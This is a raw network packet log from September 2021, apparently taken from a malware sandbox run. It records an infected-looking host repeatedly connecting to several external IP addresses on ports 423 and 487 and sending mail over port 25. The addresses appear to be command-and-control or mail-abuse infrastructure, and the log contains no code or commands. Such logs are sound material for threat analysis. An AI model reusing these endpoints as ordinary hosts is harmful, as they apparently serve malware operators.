Sep 5, 2021 15:50:30.917998075 CEST	49933	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:30.924094915 CEST	49927	25	192.168.2.4	98.136.96.93
Sep 5, 2021 15:50:30.956733942 CEST	423	49932	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:30.976767063 CEST	49926	25	192.168.2.4	198.54.122.213
Sep 5, 2021 15:50:30.984456062 CEST	423	49924	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:30.984570026 CEST	49924	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:30.991319895 CEST	423	49931	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:30.991367102 CEST	423	49933	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:30.991497040 CEST	49933	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:31.023534060 CEST	49930	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:31.023546934 CEST	49929	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:31.024065018 CEST	49934	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:31.024420977 CEST	49935	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:31.049036980 CEST	423	49929	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:31.049061060 CEST	423	49934	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:31.049127102 CEST	49929	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:31.049197912 CEST	49934	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:31.053339958 CEST	25	49927	98.136.96.93	192.168.2.4
Sep 5, 2021 15:50:31.053363085 CEST	25	49927	98.136.96.93	192.168.2.4
Sep 5, 2021 15:50:31.055613041 CEST	423	49935	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:31.055649042 CEST	423	49930	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:31.055684090 CEST	49935	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:31.055713892 CEST	49930	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:31.060993910 CEST	49927	25	192.168.2.4	98.136.96.93
Sep 5, 2021 15:50:31.063791037 CEST	423	49933	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:31.063942909 CEST	49933	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:31.074804068 CEST	423	49934	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:31.074982882 CEST	49934	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:31.087269068 CEST	423	49935	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:31.087424040 CEST	49935	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:31.099862099 CEST	423	49934	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:31.118793011 CEST	423	49935	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:31.135426044 CEST	423	49933	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:31.148488045 CEST	49928	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:31.149002075 CEST	49936	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:31.190824032 CEST	25	49927	98.136.96.93	192.168.2.4
Sep 5, 2021 15:50:31.190854073 CEST	25	49927	98.136.96.93	192.168.2.4
Sep 5, 2021 15:50:31.190958023 CEST	49927	25	192.168.2.4	98.136.96.93
Sep 5, 2021 15:50:31.204251051 CEST	49927	25	192.168.2.4	98.136.96.93
Sep 5, 2021 15:50:31.218952894 CEST	423	49936	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:31.219084978 CEST	49936	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:31.221971035 CEST	423	49928	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:31.222068071 CEST	49928	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:31.252721071 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.257883072 CEST	49931	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:31.258331060 CEST	49938	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:31.258359909 CEST	49932	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:31.258672953 CEST	49939	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:31.288971901 CEST	423	49936	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:31.289262056 CEST	49936	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:31.299068928 CEST	423	49939	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:31.299293995 CEST	49939	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:31.299834967 CEST	423	49932	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:31.299983978 CEST	49932	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:31.323740005 CEST	487	49937	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:31.323929071 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.329303980 CEST	423	49938	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:31.329432964 CEST	49938	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:31.333556890 CEST	25	49927	98.136.96.93	192.168.2.4
Sep 5, 2021 15:50:31.334811926 CEST	423	49931	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:31.334985971 CEST	49931	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:31.341521025 CEST	423	49939	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:31.341742039 CEST	49939	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:31.358710051 CEST	423	49936	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:31.383503914 CEST	423	49939	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:31.400978088 CEST	25	49918	66.111.4.70	192.168.2.4
Sep 5, 2021 15:50:31.401897907 CEST	423	49938	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:31.402081013 CEST	49938	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:31.412883043 CEST	49918	25	192.168.2.4	66.111.4.70
Sep 5, 2021 15:50:31.442445040 CEST	487	49937	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:31.442688942 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.473259926 CEST	423	49938	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:31.507911921 CEST	49933	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:31.507971048 CEST	49934	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:31.508126020 CEST	49935	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:31.508421898 CEST	49940	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:31.508743048 CEST	49941	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:31.509100914 CEST	49942	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:31.511223078 CEST	487	49937	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:31.514004946 CEST	25	49918	66.111.4.70	192.168.2.4
Sep 5, 2021 15:50:31.515238047 CEST	25	49918	66.111.4.70	192.168.2.4
Sep 5, 2021 15:50:31.522918940 CEST	49918	25	192.168.2.4	66.111.4.70
Sep 5, 2021 15:50:31.533358097 CEST	423	49934	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:31.533548117 CEST	49934	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:31.534383059 CEST	423	49941	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:31.534492970 CEST	49941	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:31.539664984 CEST	423	49935	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:31.539830923 CEST	49935	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:31.543011904 CEST	423	49942	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:31.543112040 CEST	49942	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:31.557487011 CEST	487	49937	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:31.560915947 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.560971022 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.561284065 CEST	423	49941	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:31.561463118 CEST	49941	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:31.577347994 CEST	423	49942	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:31.577522039 CEST	49942	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:31.581834078 CEST	423	49933	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:31.581979036 CEST	49933	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:31.582068920 CEST	423	49940	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:31.582211018 CEST	49940	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:31.586817980 CEST	423	49941	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:31.610793114 CEST	423	49942	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:31.625597000 CEST	25	49918	66.111.4.70	192.168.2.4
Sep 5, 2021 15:50:31.626662970 CEST	25	49918	66.111.4.70	192.168.2.4
Sep 5, 2021 15:50:31.629919052 CEST	487	49937	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:31.629956007 CEST	487	49937	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:31.629985094 CEST	487	49937	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:31.638091087 CEST	49918	25	192.168.2.4	66.111.4.70
Sep 5, 2021 15:50:31.655810118 CEST	423	49940	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:31.656043053 CEST	49940	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:31.658076048 CEST	487	49937	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:31.658276081 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.658411980 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.658458948 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.658534050 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.658600092 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.658657074 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.658715963 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.658771038 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.727165937 CEST	487	49937	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:31.727253914 CEST	487	49937	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:31.727288008 CEST	487	49937	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:31.728984118 CEST	423	49940	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:31.739834070 CEST	25	49918	66.111.4.70	192.168.2.4
Sep 5, 2021 15:50:31.741559029 CEST	25	49918	66.111.4.70	192.168.2.4
Sep 5, 2021 15:50:31.763577938 CEST	49918	25	192.168.2.4	66.111.4.70
Sep 5, 2021 15:50:31.772147894 CEST	487	49937	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:31.772193909 CEST	487	49937	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:31.772269011 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.772444010 CEST	49937	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:31.841306925 CEST	487	49937	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:31.865056038 CEST	25	49918	66.111.4.70	192.168.2.4
Sep 5, 2021 15:50:31.865199089 CEST	49918	25	192.168.2.4	66.111.4.70
Sep 5, 2021 15:50:32.117407084 CEST	49936	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:32.117433071 CEST	49939	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:32.118010998 CEST	49943	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:32.118386030 CEST	49944	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:32.158628941 CEST	423	49939	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:32.158735037 CEST	49939	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:32.159311056 CEST	423	49944	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:32.159444094 CEST	49944	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:32.187629938 CEST	423	49936	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:32.187756062 CEST	49936	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:32.191802979 CEST	423	49943	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:32.191915989 CEST	49943	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:32.192102909 CEST	49938	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:32.192614079 CEST	49945	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:32.201103926 CEST	423	49944	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:32.201376915 CEST	49944	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:32.226779938 CEST	49941	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:32.226788044 CEST	49942	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:32.227349997 CEST	49946	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:32.227794886 CEST	49947	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:32.242568970 CEST	423	49944	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:32.251879930 CEST	423	49941	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:32.252018929 CEST	49941	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:32.252270937 CEST	423	49946	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:32.252361059 CEST	49946	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:32.258789062 CEST	423	49947	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:32.258902073 CEST	49947	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:32.259237051 CEST	423	49945	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:32.259320974 CEST	49945	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:32.259824991 CEST	423	49942	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:32.259910107 CEST	49942	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:32.263962984 CEST	423	49938	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:32.264094114 CEST	49938	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:32.266555071 CEST	423	49943	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:32.266733885 CEST	49943	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:32.277535915 CEST	423	49946	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:32.277744055 CEST	49946	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:32.290925980 CEST	423	49947	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:32.291208982 CEST	49947	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:32.305483103 CEST	423	49946	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:32.306155920 CEST	49948	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:32.308917999 CEST	49940	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:32.327461958 CEST	423	49947	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:32.327534914 CEST	423	49945	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:32.327775955 CEST	49945	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:32.342669964 CEST	423	49943	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:32.381010056 CEST	423	49948	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:32.381144047 CEST	49948	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:32.382276058 CEST	423	49940	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:32.382339001 CEST	49940	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:32.394418001 CEST	423	49945	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:32.453334093 CEST	423	49948	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:32.453541994 CEST	49948	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:32.527065039 CEST	423	49948	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:32.570580959 CEST	49944	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:32.571286917 CEST	49949	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:32.612077951 CEST	423	49944	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:32.612095118 CEST	423	49949	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:32.612145901 CEST	49944	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:32.612219095 CEST	49949	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:32.653332949 CEST	423	49949	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:32.653529882 CEST	49949	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:32.679867983 CEST	49943	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:32.679941893 CEST	49946	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:32.679974079 CEST	49947	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:32.680413961 CEST	49950	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:32.680933952 CEST	49951	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:32.681265116 CEST	49952	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:32.694297075 CEST	423	49949	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:32.704848051 CEST	423	49946	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:32.704946995 CEST	49946	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:32.705981970 CEST	423	49951	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:32.706135988 CEST	49951	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:32.710869074 CEST	423	49947	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:32.710956097 CEST	49947	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:32.713510036 CEST	423	49952	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:32.713644981 CEST	49952	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:32.731713057 CEST	423	49951	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:32.731956005 CEST	49951	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:32.747236967 CEST	423	49952	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:32.747442007 CEST	49952	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:32.748425007 CEST	423	49950	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:32.748509884 CEST	49950	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:32.753659010 CEST	423	49943	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:32.753757000 CEST	49943	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:32.757092953 CEST	423	49951	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:32.779741049 CEST	423	49952	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:32.805058002 CEST	49945	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:32.805604935 CEST	49953	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:32.815936089 CEST	423	49950	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:32.816293001 CEST	49950	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:32.871953011 CEST	423	49945	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:32.872025967 CEST	49945	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:32.874826908 CEST	423	49953	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:32.874912977 CEST	49953	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:32.883909941 CEST	423	49950	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:32.924738884 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:32.944152117 CEST	423	49953	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:32.944422007 CEST	49953	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:32.993963957 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:32.994076967 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.014641047 CEST	423	49953	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:33.112641096 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.112919092 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.182516098 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.210429907 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.214370012 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.214423895 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.284216881 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.284888983 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.304936886 CEST	49948	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:33.305432081 CEST	49955	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:33.324750900 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.328196049 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.328398943 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.328510046 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.328567982 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.328638077 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.328722954 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.328795910 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.328845978 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.328902960 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.328959942 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.372968912 CEST	423	49955	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:33.373058081 CEST	49955	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:33.376931906 CEST	423	49948	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:33.377033949 CEST	49948	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:33.398957014 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.399058104 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.399194956 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.399650097 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.399794102 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.400032043 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.400645971 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.401267052 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.401761055 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.433856010 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.434082985 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.434250116 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.434438944 CEST	49954	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:33.441502094 CEST	423	49955	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:33.441708088 CEST	49955	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:33.503038883 CEST	487	49954	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:33.509406090 CEST	423	49955	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:33.586283922 CEST	49949	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:33.586935997 CEST	49956	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:33.627728939 CEST	423	49949	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:33.627948999 CEST	49949	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:33.627974987 CEST	423	49956	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:33.628169060 CEST	49956	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:33.669807911 CEST	423	49956	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:33.677212954 CEST	49956	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:33.711267948 CEST	49952	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:33.711271048 CEST	49951	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:33.711776972 CEST	49957	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:33.712172985 CEST	49958	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:33.718146086 CEST	423	49956	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:33.736742020 CEST	423	49951	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:33.736818075 CEST	423	49957	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:33.736880064 CEST	49951	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:33.736916065 CEST	49957	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:33.742743015 CEST	423	49958	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:33.742827892 CEST	49958	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:33.743801117 CEST	423	49952	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:33.743906975 CEST	49952	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:33.762520075 CEST	423	49957	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:33.762789011 CEST	49957	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:33.773570061 CEST	423	49958	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:33.773818016 CEST	49958	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:33.787929058 CEST	423	49957	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:33.804414988 CEST	423	49958	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:33.805032969 CEST	49950	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:33.805536032 CEST	49959	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:33.820624113 CEST	49953	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:33.821130991 CEST	49960	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:33.874492884 CEST	423	49959	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:33.874618053 CEST	49959	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:33.879359007 CEST	423	49950	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:33.879461050 CEST	49950	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:33.890547991 CEST	423	49953	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:33.890654087 CEST	49953	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:33.892323017 CEST	423	49960	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:33.892431021 CEST	49960	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:33.943247080 CEST	423	49959	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:33.943489075 CEST	49959	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:33.965778112 CEST	423	49960	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:33.966006994 CEST	49960	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:33.976995945 CEST	49955	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:33.977523088 CEST	49961	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:34.011595964 CEST	423	49959	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:34.037476063 CEST	423	49960	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:34.039434910 CEST	49956	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:34.039983034 CEST	49962	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:34.044563055 CEST	423	49955	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:34.044627905 CEST	49955	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:34.050120115 CEST	423	49961	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:34.050244093 CEST	49961	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:34.081732988 CEST	423	49962	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:34.081868887 CEST	49962	423	192.168.2.4	95.216.195.92
